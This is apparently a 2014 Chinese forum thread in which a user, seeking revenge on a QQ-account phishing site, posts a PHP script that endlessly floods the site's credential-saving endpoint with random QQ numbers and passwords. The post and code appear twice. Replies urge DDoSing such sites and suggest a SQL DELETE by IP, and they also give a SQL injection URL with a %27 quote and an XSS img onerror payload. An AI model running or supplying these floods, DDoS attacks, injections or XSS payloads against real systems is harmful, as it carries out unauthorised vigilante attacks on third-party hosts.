这是一个创建于 3855 天前的主题,其中的信息可能已经有所发展或是发生改变。
为什么钓鱼网站这么容易看出来,还有很多人老中招呢?今天一个同学又中招了,QQ号被盗了。
钓鱼网站地址: http://2d6kffw6y.qqxzo.com/shouji/index.asp?uid=352&u=103&d=220
被盗之后还会拿这个号码继续群发一些很诱惑的信息,比如什么砍人的新闻,让更多的人上当
以前身边的人就经常被钓,一直想着报复一下钓鱼网站,今天终于动手了
原理很简单,不停提交随机的QQ号和密码,让对方无法判断哪个是真的号码
以下是php代码,在cli中运行:
<?php
function random_readable_pwd($length=10){
// the wordlist from which the password gets generated
// (change them as you like)
$words = 'dog,cat,sheep,sun,sky,red,ball,happy,ice,xue,1989,1991,%,8,6,';
$words .= 'green,blue,music,ting,radio,peng,turbo,song,!@#,55,1990,$,90,99,';
$words .= 'jun,an,paper,water,fire,storm,xiao,abc,123,456,@,66,121,ai,100,';
$words .= 'boot,freedom,wang,nice,fan,small,eyes,aaa,!,888,xm,woai,6666,';
$words .= 'path,kid,box,black,flower,ping,pong,smile,2000,00,321,zhao,kk,';
$words .= 'he,niu,ll,plus,king,tv,ring,jiao,xiao,lei,1980,1995,zz,1986';
// Split by ",":
$words = explode(',', $words);
if (count($words) == 0){ die('Wordlist is empty!'); }
// Add words while password is smaller than the given length
$pwd = '';
while (strlen($pwd) < $length){
$r = mt_rand(0, count($words)-1);
$pwd .= $words[$r];
}
// append a number at the end if length > 2 and
// reduce the password size to $length
$num = mt_rand(1, 99);
if ($length > 2){
$pwd = substr($pwd,0,$length-strlen($num)).$num;
} else {
$pwd = substr($pwd, 0, $length);
}
return $pwd;
}
$serverurl='http://2d6kffw6y.qqxzo.com/shouji/saveinfo.asp';
while(1){
$u=rand(1000000, 9999999999);
$p=random_readable_pwd(rand(7,13));
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $serverurl );
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$url = "uid=103&u=$u&p=$p";
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$data = curl_exec($ch);
curl_close($ch);
echo date('H:i:s').' u='.$u.' p='.$p.' r='.$data."\n";
}
?>
钓鱼网站地址: http://2d6kffw6y.qqxzo.com/shouji/index.asp?uid=352&u=103&d=220
被盗之后还会拿这个号码继续群发一些很诱惑的信息,比如什么砍人的新闻,让更多的人上当
以前身边的人就经常被钓,一直想着报复一下钓鱼网站,今天终于动手了
原理很简单,不停提交随机的QQ号和密码,让对方无法判断哪个是真的号码
以下是php代码,在cli中运行:
<?php
function random_readable_pwd($length=10){
// the wordlist from which the password gets generated
// (change them as you like)
$words = 'dog,cat,sheep,sun,sky,red,ball,happy,ice,xue,1989,1991,%,8,6,';
$words .= 'green,blue,music,ting,radio,peng,turbo,song,!@#,55,1990,$,90,99,';
$words .= 'jun,an,paper,water,fire,storm,xiao,abc,123,456,@,66,121,ai,100,';
$words .= 'boot,freedom,wang,nice,fan,small,eyes,aaa,!,888,xm,woai,6666,';
$words .= 'path,kid,box,black,flower,ping,pong,smile,2000,00,321,zhao,kk,';
$words .= 'he,niu,ll,plus,king,tv,ring,jiao,xiao,lei,1980,1995,zz,1986';
// Split by ",":
$words = explode(',', $words);
if (count($words) == 0){ die('Wordlist is empty!'); }
// Add words while password is smaller than the given length
$pwd = '';
while (strlen($pwd) < $length){
$r = mt_rand(0, count($words)-1);
$pwd .= $words[$r];
}
// append a number at the end if length > 2 and
// reduce the password size to $length
$num = mt_rand(1, 99);
if ($length > 2){
$pwd = substr($pwd,0,$length-strlen($num)).$num;
} else {
$pwd = substr($pwd, 0, $length);
}
return $pwd;
}
$serverurl='http://2d6kffw6y.qqxzo.com/shouji/saveinfo.asp';
while(1){
$u=rand(1000000, 9999999999);
$p=random_readable_pwd(rand(7,13));
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $serverurl );
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$url = "uid=103&u=$u&p=$p";
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$data = curl_exec($ch);
curl_close($ch);
echo date('H:i:s').' u='.$u.' p='.$p.' r='.$data."\n";
}
?>
 |
1
bitbegin 2014-04-29 13:25:47 +08:00 via Android  1
这就算报复?
|
 |
3
anheiyouxia 2014-04-29 13:34:10 +08:00 via Android 1
这样的攻击,我初中的时候就开始做了。
但是如果对方有记录IP的,一句话就搞掂了 delete * from tabe where ip=‘110.110.110.110' |
 |
4
dong3580 2014-04-29 13:43:38 +08:00
|
|
5
anheiyouxia 2014-04-29 14:25:57 +08:00 via Android
@dong3580 就是,这些骗子也在进步
|
 |
6
ligyxy 2014-04-29 14:32:01 +08:00
只可惜GFW不屏蔽虚假网站
|
 |
7
mahone3297 2014-04-29 14:41:04 +08:00
网站好像挂了?。。。
|
 |
8
saggit 2014-04-29 15:24:51 +08:00
有没有大神出手呀
|
 |
9
vigoss 2014-04-29 15:27:04 +08:00
跳转到真的网站上了
|
 |
10
jacy OP @anheiyouxia 不知道存储ip没有,不过现在已经把我ip拉黑了,拒绝访问了,换ip继续
|
|
11
anheiyouxia 2014-04-29 17:59:32 +08:00 via Android
@jacy 其实对待这些网站的正确做法是直接DDOS,一般空间商就直接把它给下架了
|
 |
12
RIcter 2014-04-29 21:18:06 +08:00
1.安装了安全狗(钓鱼网站安装安全狗卧槽
2.存在 SQL 注入,注入点http://2d6kffw6y.qqxzo.com/shouji/index.asp?uid=352&u=103&id=220%27 如果顺利能拿下来,虽然狗不好过.. |
 |
13
superwbd 2014-04-30 04:39:18 +08:00
这年头不都流行XSS么。。。
|
 |
14
SelFree 2014-04-30 17:13:22 +08:00
自从大家学会提交XSS代码之后,钓鱼网站都爱上安全狗了。
|
 |
15
ytf4425 2014-05-02 21:38:40 +08:00
<img onerror=”alert(123)” src=http://xxx.com>
|
|
16
ytf4425 2014-05-02 21:39:24 +08:00
不对<”tiehua ‘>
|
Select Language